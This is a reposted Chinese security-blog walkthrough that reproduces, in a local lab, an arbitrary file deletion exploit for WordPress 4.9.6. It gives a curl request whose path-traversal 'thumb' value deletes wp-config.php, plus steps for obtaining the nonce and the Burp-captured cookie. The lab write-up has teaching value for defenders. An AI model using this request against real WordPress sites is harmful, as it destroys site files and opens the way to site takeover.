关注我们

WordPress 4.9.6任意文件删除漏洞利用

网友投稿网友投稿 安全文摘 2018-07-05 344718 0

WordPress是目前网络上最受欢迎的CMS。约有30%的网站都在使用它。这种广泛的采用,也使其成为了网络犯罪分子非常感兴趣的一个目标.RIPS团队在7个月前,向WordPress安全团队报告了这个漏洞,但至今发稿前依然没有得到修复。

受影响的版本

受影响的版本

WordPress版本(包括当前的4.9.6版本)

比较鸡肋的是如果要利用该漏洞,攻击者需要作者权限登陆账号和删除媒体文件的权限。我根据谷歌搜索前三页WordPress站点,通过注册页面登陆发现权限很低;没有上传图片的权限。导致没有利用成功;
所以说WordPress安全团队迟迟没有修复漏洞,肯定认为这只是低危漏洞

利用

  1. 搭建环境

WordPress 4.9.6任意文件删除漏洞利用

WordPress 4.9.6

WordPress 4.9.6任意文件删除漏洞利用

安装成功后,在后台添加一个“作者”权限账户 “test” 只有写作功能,用于测试

2.添加媒体,上传一张图片

WordPress 4.9.6任意文件删除漏洞利用

3.在页面源码中找出 _wpnonce 值,通过页面源码查找 值为“5df9982e4e”

WordPress 4.9.6任意文件删除漏洞利用

4.发送请求

curl -v 'http://192.168.0.9/wordpress/wp-admin/post.php?post=9' -H 'Cookie: ****' -d 'action=editattachment&_wpnonce=5df9982e4e&thumb=../../../../wp-config.php'

WordPress 4.9.6任意文件删除漏洞利用
Cookie 可通过 burpsuite 截取
WordPress 4.9.6任意文件删除漏洞利用

发送命令之后回显成功,点击页面中的永久删除;再点击 burpsuite 中的 intercept is on 取消即可删除成功直接跳转安装页面
WordPress 4.9.6任意文件删除漏洞利用

WordPress 4.9.6任意文件删除漏洞利用

【完】
参考来源
http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

本文转载来自安全猎人/ScriptM转载

但是其实小编还是觉得吧!最近都用WordPress CMS操作系统了之前的织梦不知道还有没有人用呢,大家可以在下面评论出来哦!


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址